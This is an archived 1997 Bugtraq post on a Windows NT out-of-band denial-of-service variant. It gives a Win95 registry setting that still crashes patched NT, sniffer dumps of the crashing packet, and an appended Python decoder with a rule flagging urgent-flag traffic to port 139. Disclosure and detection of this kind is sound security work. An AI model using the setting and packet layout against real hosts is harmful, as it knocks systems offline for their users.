Bugtraq mailing list archives
Son of OOB part II - answer? (long)
From: aleph1 () DFW NET (Aleph One)
Date: Sat, 24 May 1997 11:22:39 -0500
---------- Forwarded message ----------
Date: 22 May 97 9:49:09 EDT
From: Ryan Russell/SYBASE <Ryan.Russell () sybase com>
Reply-To: Ryan () phoenix iss net, Russell/SYBASE () phoenix iss net
To: ntsecurity <ntsecurity () iss net>
Subject: [NTSEC] Son of OOB part II - answer? (long)

You have to love the irony of this one: It turns out that if you apply the registry fix from this page:

http://www.ntsecurity.net/security/oob.htm

then your Win95 client can still crash an NT box. This answers my own earlier question..

I broke out my sniffer, and it looks like the difference is in the urgent pointer. The one that will still crash seems to have an urgent pointer of 2, and the one that doesn't has an urgent pointer of 3.

Here's what seems to be an explanation of why there is a difference, from TCP/IP Illustrated Volume 1, Stevens 1994, p. 292-293 (it looks like I may be quoting a quote, but I can't tell for sure):

"There is continuing debate about whether the urgent pointer points to the last byte of urgent data, or to the byte following the last byte of urgent data. The original TCP specification gave both interpretations but the Host Requirements RFC identifies which is correct: the urgent pointer points to the last byte of urgent data. The problem, however, is that most implementations (i.e. the Berkeley-derived implementations) continue to use the wrong interpretation. An implementation that follows the specification in the Host Requirements RFC might be compliant, but might not communicate correctly with most other hosts."

At least the Win95 designers seem to have allowed for both possibilities.

Anyway, anyone who makes the following registry entry on their Win95 machine:

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP]
"BSDUrgent"="0"

Can still crash NT at will, it seems. The Win95 machine with the registry entry applied doesn't seem to be affected by either type of OOB crash.
I've also included the two different packets (I believe I've included the only pertinent packet out of the sequence) so that if I've misinterpreted the reason, one can draw their own conclusions. These were tested against an NT 3.51 server with SP5 and the Hotfix installed.

Ryan

Still crashes:

DLC: ----- DLC Header -----
DLC:
DLC: Frame 7 arrived at 08:17:26.6547; frame size is 60 (003C hex) bytes.
DLC: Destination = Station Compaq38E42A
DLC: Source = Station Compaq78C49E
DLC: Ethertype = 0800 (IP)
DLC:
IP: ----- IP Header -----
IP:
IP: Version = 4, header length = 20 bytes
IP: Type of service = 00
IP: 000. .... = routine
IP: ...0 .... = normal delay
IP: .... 0... = normal throughput
IP: .... .0.. = normal reliability
IP: Total length = 43 bytes
IP: Identification = 17152
IP: Flags = 4X
IP: .1.. .... = don't fragment
IP: ..0. .... = last fragment
IP: Fragment offset = 0 bytes
IP: Time to live = 32 seconds/hops
IP: Protocol = 6 (TCP)
IP: Header checksum = 4B5B (correct)
IP: Source address = [130.214.99.98]
IP: Destination address = [130.214.99.99], netcom_nt.sybase.com
IP: No options
IP:
TCP: ----- TCP header -----
TCP:
TCP: Source port = 1030
TCP: Destination port = 139 (NetBIOS-ssn)
TCP: Sequence number = 97385
TCP: Acknowledgment number = 56167856
TCP: Data offset = 20 bytes
TCP: Flags = 38
TCP: ..1. .... = Urgent pointer
TCP: ...1 .... = Acknowledgment
TCP: .... 1... = Push
TCP: .... .0.. = (No reset)
TCP: .... ..0. = (No SYN)
TCP: .... ...0 = (No FIN)
TCP: Window = 8760
TCP: Checksum = 877F (correct)
TCP: Urgent pointer = 2
TCP: No TCP options
TCP: [3 byte(s) of data]
TCP:
NETB: ----- NetBIOS Session protocol -----
NETB:
NETB: [3 more bytes of user data]
NETB:

ADDR HEX ASCII
0000 00 80 5F 38 E4 2A 00 80 5F 78 C4 9E 08 00 45 00 .._8.*.._x....E.
0010 00 2B 43 00 40 00 20 06 4B 5B 82 D6 63 62 82 D6 .+C.@. .K[..cb..
0020 63 63 04 06 00 8B 00 01 7C 69 03 59 0D B0 50 38 cc......|i.Y..P8
0030 22 38 87 7F 00 02 42 79 65 00 00 00             "8....Bye...
Doesn't crash any more:

IP: Fragment offset = 0 bytes
IP: Time to live = 32 seconds/hops
IP: Protocol = 6 (TCP)
IP: Header checksum = 835B (correct)
IP: Source address = [130.214.99.98]
IP: Destination address = [130.214.99.99], netcom_nt.sybase.com
IP: No options
IP:
TCP: ----- TCP header -----
TCP:
TCP: Source port = 1026
TCP: Destination port = 139 (NetBIOS-ssn)
TCP: Sequence number = 69792
TCP: Acknowledgment number = 136447
TCP: Data offset = 20 bytes
TCP: Flags = 38
TCP: ..1. .... = Urgent pointer
TCP: ...1 .... = Acknowledgment
TCP: .... 1... = Push
TCP: .... .0.. = (No reset)
TCP: .... ..0. = (No SYN)
TCP: .... ...0 = (No FIN)
TCP: Window = 8760
TCP: Checksum = EF53 (correct)
TCP: Urgent pointer = 3
TCP: No TCP options
TCP: [3 byte(s) of data]
TCP:
NETB: ----- NetBIOS Session protocol -----
NETB:
NETB: [3 more bytes of user data]
NETB:

ADDR HEX ASCII
0000 00 80 5F 38 E4 2A 00 80 5F 78 C4 9E 08 00 45 00 .._8.*.._x....E.
0010 00 2B 0B 00 40 00 20 06 83 5B 82 D6 63 62 82 D6 .+..@. ..[..cb..
0020 63 63 04 02 00 8B 00 01 10 A0 00 02 14 FF 50 38 cc............P8
0030 22 38 EF 53 00 03 42 79 65 00 00 00             "8.S..Bye...
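As an added example (not part of the original post), the following Python decodes the two hex dumps Ryan included, pulls out the URG flag and urgent pointer, and shows how much of the 3-byte payload counts as urgent under each of the two interpretations Stevens describes; the check at the end is the simple defender's rule of flagging any URG segment to TCP/139. It assumes the dumps are Ethernet II frames and that no word in the ASCII column is exactly two hex digits.

```python
import re
import struct

# Both dumps are copied from the message above, ASCII column included.
STILL_CRASHES = """\
0000 00 80 5F 38 E4 2A 00 80 5F 78 C4 9E 08 00 45 00 .._8.*.._x....E.
0010 00 2B 43 00 40 00 20 06 4B 5B 82 D6 63 62 82 D6 .+C.@. .K[..cb..
0020 63 63 04 06 00 8B 00 01 7C 69 03 59 0D B0 50 38 cc......|i.Y..P8
0030 22 38 87 7F 00 02 42 79 65 00 00 00             "8....Bye..."""
NO_CRASH = """\
0000 00 80 5F 38 E4 2A 00 80 5F 78 C4 9E 08 00 45 00 .._8.*.._x....E.
0010 00 2B 0B 00 40 00 20 06 83 5B 82 D6 63 62 82 D6 .+..@. ..[..cb..
0020 63 63 04 02 00 8B 00 01 10 A0 00 02 14 FF 50 38 cc............P8
0030 22 38 EF 53 00 03 42 79 65 00 00 00             "8.S..Bye..."""
HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")

def parse_dump(text):
    """Rebuild the raw frame from an 'ADDR HEX ASCII' dump: skip the offset
    column, keep up to 16 hex bytes, drop the ASCII column (assumption: no
    ASCII word is exactly two hex digits)."""
    out = bytearray()
    for line in text.splitlines():
        out += bytes(int(t, 16) for t in line.split()[1:17] if HEX_BYTE.match(t))
    return bytes(out)

def decode_tcp(frame):
    """Ethernet II -> IPv4 -> TCP. Ethernet padding is cut off via IP total length."""
    if frame[12:14] != b"\x08\x00":
        raise ValueError("not IPv4")
    ip = frame[14:]
    ihl, total_len, proto = (ip[0] & 0x0F) * 4, struct.unpack("!H", ip[2:4])[0], ip[9]
    if proto != 6:
        raise ValueError("not TCP")
    tcp = ip[ihl:total_len]
    sport, dport, _seq, _ack, off_flags, _win, _csum, urg = struct.unpack("!HHIIHHHH", tcp[:20])
    return {"sport": sport, "dport": dport, "urg_flag": bool(off_flags & 0x20),
            "urg_ptr": urg, "payload": tcp[(off_flags >> 12) * 4:]}

def urgent_bytes(seg, bsd=True):
    """BSD reading: pointer is the offset just past the last urgent byte.
    Host Requirements (RFC 1122) reading: pointer is the offset of the last urgent byte.
    Returns (urgent data, True if the pointer reaches past the data in the segment)."""
    n = seg["urg_ptr"] if bsd else seg["urg_ptr"] + 1
    return seg["payload"][:n], n > len(seg["payload"])

def is_oob_to_netbios(seg):
    """Detection rule: URG set on a segment to TCP/139, whatever the pointer value."""
    return seg["urg_flag"] and seg["dport"] == 139
```

For the crashing frame the pointer of 2 means two urgent bytes under the BSD reading and all three under RFC 1122; for the non-crashing frame the pointer of 3 covers the whole payload under BSD and points past it under RFC 1122, which is exactly the ambiguity the Stevens quote describes.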